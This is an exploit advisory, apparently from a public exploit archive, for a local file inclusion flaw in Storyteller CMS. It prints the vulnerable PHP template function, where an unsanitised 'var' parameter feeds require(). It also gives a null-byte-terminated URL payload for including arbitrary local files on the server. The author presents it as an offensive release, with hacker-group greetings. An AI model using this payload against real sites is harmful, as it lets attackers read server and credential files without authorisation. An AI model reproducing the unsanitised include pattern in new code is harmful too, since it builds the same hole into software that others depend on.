[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : Storyteller CMS (var) Local File Inclusion Vulnerability
# Published : 2010-09-13
# Author : BorN To K!LL
# Previous Title : UCenter Home 2.0 SQL Injection Vulnerability
# Next Title : Joomla Component Mosets Tree 2.1.5 Shell Upload Vulnerability
==
[~] Title: Storyteller CMS (var) Local File Include Vuln
[~] Version: n/a
[~] Link: http://www.esselbach.com/freeware.php?id=2
==
[~] Author: BorN To K!LL - h4ck3r
[~] Contact: SQL@hotmail.co.uk
==
[~] Vuln code:
in GetTemplate function , line 113 to 127
function GetTemplate($var)
{
if (file_exists("templates/$var.tmp.php"))
{
require("templates/$var.tmp.php");
}
else
{
die ("Error: Can't open template $var");
}
return $EST_TEMPLATE;
}
[~] 3xploit:
/core.php?var=[Local-File]%00
==
[#] Greetings:
Dr.2 , darkc0de team , inj3ct0r's Community , and all ma friends ,,
==